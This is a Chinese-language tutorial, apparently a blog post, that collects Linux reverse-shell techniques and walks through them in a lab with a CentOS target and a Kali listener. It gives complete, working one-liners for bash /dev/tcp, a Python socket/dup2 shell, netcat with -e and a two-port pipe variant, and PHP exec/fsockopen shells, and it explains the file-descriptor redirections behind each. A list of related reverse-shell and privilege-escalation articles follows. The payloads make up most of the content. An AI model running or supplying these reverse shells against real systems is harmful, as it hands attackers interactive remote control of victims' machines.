linux下几种反弹Shell方法的总结与理解
实验环境
CentOS 6.5:192.168.0.3
kali2.0:192.168.0.4
方法1:
反弹shell命令如下:
bash -i >& /dev/tcp/ip/port 0>&1首先,使用nc在kali上监听端口:
nc -lvp 7777
然后在CentOS6.5下输入:
bash -i >& /dev/tcp/192.168.0.4/7777 0>&1
可以看到shell成功反弹到了kali上面,可以执行命令:
在解释这条反弹shell的命令原理之前,首先需要掌握几个点。
linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:
0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>
还有就是>&这个符号的含义,最好的理解是这样的:
当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符
也有师傅把&这个符号解释为是取地址符号,学过C语言的小伙伴们都知道&这个符号代表取地址符,在C++中&符号还代表为引用,这样做是为了区分文件描述符和文件,比如查看一个不存在的文件,要把标准错误重定向到标准输出,如果直接cat notexistfile 2>1的话,则会将1看作是一个文件,将标准错误输出输出到1这个文件里而不是标准输出,而&的作用就是为了区分文件和文件描述符:
理解了上面这些知识,下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程上,如果远程开启了对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出,这个时候我们在本机CentOS输入命令,输出以及错误输出的内容就会被传递显示到远程。
在本地输入设备(键盘)输入命令,在本地看不到输入的内容,但是键盘输入的命令已经被输出到了远程,然后命令的执行结果或者错误也会被传到远程,查看远程,可以看到标准输出和标准错误输出都重定向到了远程:
下面在该命令后面加上0>&1,代表将标准输入重定向到标准输出,这里的标准输出已经重定向到了/dev/tcp/ip/port这个文件,也就是远程,那么标准输入也就重定向到了远程,这样的话就可以直接在远程输入了:
那么,0>&2也是可以的,代表将标准输入重定向到标准错误输出,而标准错误输出重定向到了/dev/tcp/ip/port这个文件,也就是远程,那么标准输入也就重定向到了远程:
为了更形象的理解,下面给出了整个过程的数据流向,首先是本地的输入输出流向:
执行bash -i >& /dev/tcp/ip/port后
执行bash -i >& /dev/tcp/ip/port 0>&1或者bash -i >& /dev/tcp/ip/port 0>&2后:
方法2:
使用python反弹,反弹shell命令如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"首先,使用nc在kali上监听端口:
nc -lvp 7777
在CentOS下使用python去反向连接,输入:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
可以看到kali上成功反弹到了shell,可以执行一些命令:
在已经深入理解了第一种方法的原理后,下面来解释一下python反弹shell的原理。
首先使用socket与远程建立起连接,接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方法有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关闭fd2,然后将fd1代表的那个文件强行复制给fd2,在这里可以把fd1和fd2看作是C语言里的指针,将fd1赋值给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这里也就是建立socket连接返回的文件描述符,经过测试可以看到值为3。
于是这样就相当于将标准输入(0)、标准输出(1)、标准错误输出(2)重定向到远程(3),接下来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。
方法3:
使用nc反弹shell,需要的条件是被反弹shell的机器安装了nc,CentOS6.5安装nc方法如下:
1、下载安装
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
tar -zxvf netcat-0.7.1.tar.gz -C /usr/local
cd /usr/local
mv netcat-0.7.1 netcat
cd /usr/local/netcat
./configure
make && make install
2、配置
vim /etc/profile
添加以下内容:
# set netcat path
export NETCAT_HOME=/usr/local/netcat
export PATH=$PATH:$NETCAT_HOME/bin
保存,退出,并使配置生效:
source /etc/profile
3、测试
nc -help成功
之后在kali上使用nc监听端口:
nc -lvp 7777
在CentOS上使用nc去反向连接,命令如下:
nc -e /bin/bash 192.168.0.4 7777
这里的-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。
注意之前使用nc监听端口反弹shell时都会有一个警告:Warning: forward host lookup failed for bogon: Unknown host,根据nc帮助文档的提示加上-n参数就可以不产生这个警告了,-n参数代表在建立连接之前不对主机进行dns解析。
nc -nlvp 7777
如果nc不支持-e参数的话,可以利用到linux中的管道符,首先在kali上开启监听:
nc -nvlp 6666
nc -nvlp 7777
之后在CentOS上使用nc去反向链接:
nc 192.168.0.4 6666|/bin/bash|192.168.0.4 7777
这里通过在kali上监听两个端口,然后在使用CentOS进行反向连接的时候使用到了管道符,管道符的作用是把管道符前的输出作为管道符后的输入,这样的话就可以在远程的6666端口的输入设备(键盘)输入命令,将命令输出传递至本地的/bin/bash,通过本地shell解释执行命令后,将命令执行的结果以及错误输入到远程的7777端口。
方法4:
使用php反弹shell,方法如下 。
首先最简单的一个办法,就是使用php的exec函数执行方法1反弹shell的命令:
php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
还有一个是之前乌云知识库上的一个姿势,使用php的fsockopen去连接远程:
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
这个姿势看起来有一些难以理解,尤其是还出现了<&这个符号,当然如果把&看着是取地址符或者是引用,那还是可以理解的,为了更方便的理解,我在这将这条命令稍微修改了一下,类似于前面的第二种方法。
有了之前的基础,我们知道3代表的是使用fsockopen函数建立socket返回的文件描述符,这里将标准输入,标准输出和标准错误输出都重定向到了远程
在CentOS上反向连接,输入:
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
注意php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。
linux下几种反弹Shell方法的总结与理解相关推荐
- mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载. 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了 ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...
- linux系统打开远程端口,linux下3种检测远程端口是否打开的方法
原标题:linux下3种检测远程端口是否打开的方法 方法一. telnet 常用telnet ip port方式测试远程主机端口是否打开. 方法二. nmap nmap ip -p port 测试端口 ...
- 内网渗透-常用反弹shell方法总结
常用反弹shell方法总结 文章目录 常用反弹shell方法总结 前言 bash反弹shell nc反弹shell 1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 ...
- linux 批量更换文件名,Linux下批量修改文件名的方法
Linux下批量修改文件名的方法 在Linux环境下修改文件名可以有不同的命令方式,比如rename.mv都可以进行修改,如果用户正在了解这方面的知识,可以阅读下文了解Linux修改文件名以及批量修改 ...
- linux如何卸载mysql5.7,Linux下Mysql5.7.19卸载方法
Linux下Mysql5.7.19卸载方法 1.查找以前是否装有mysql 命令:rpm -qa|grep -i mysql 可以看到mysql的两个包: mysql-*..*.RHEL** mysq ...
- linux 添加用户主目录,linux下修改用户主目录的方法
linux下修改用户主目录的方法 第一,修改/etc/passwd文件 第二,usermod命令 具体方法: 第一种方法:vi /etc/passwd 找到要修改的用户那几行,修改掉即可.此法很暴力, ...
- 提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
文章目录 提权 一.概述 二.水平越权&垂直越权 三.分类 - windows 1. 基于windows2003 2. 基于windows2008 3. ms SQL提权 5. nc反弹she ...
- kill掉多个进程linux中的sudo,linux下批量kill进程的方法
--kill某个用户下的所有进程(用户为test) --pkill # pkill -u test --killall # killall -u test --ps # ps -ef | grep t ...
最新文章
- oracle mod结果不正确,日常问题解决记录三:记一次Win10安装Oracle11g后遇到的问题...
- Python的零基础超详细讲解(第八天)-Python的条件判断
- Python开发【第一篇】:目录
- javafx 使用_使用JavaFX AnimationTimer
- MyEclipse生成常用方法
- oracle segment undo_71_UNDO扩展学习
- 4.2 算法之数论 1486 A Funny Game python
- c语言程序设计考场排座位,“听说学霸座位是这个?”老师揭秘排座,真正的C位其实在这里……...
- oracle 查询判断语句
- 【HDU6286】2018(容斥)
- 关于神经网络的英语单词有,神经网络的英文单词
- 03 【Nginx虚拟主机和域名解析】
- scada系统远程服务器,scada服务器是什么,scada系统的作用
- MCS:离散随机变量——Poisson分布
- 趣头条的开屏广告有什么优势呢?适合哪些企业投放?
- 圣杯布局原来这么简单!!
- JAVA面试、笔试题
- pandas读取大csv报错:TypeError: ufunc ‘isnan‘ not supported for the input types, and the inputs could not
- matlab如何实现动态显示,matlab 坐标图动画,动态显示数据
- MYSQL——触发器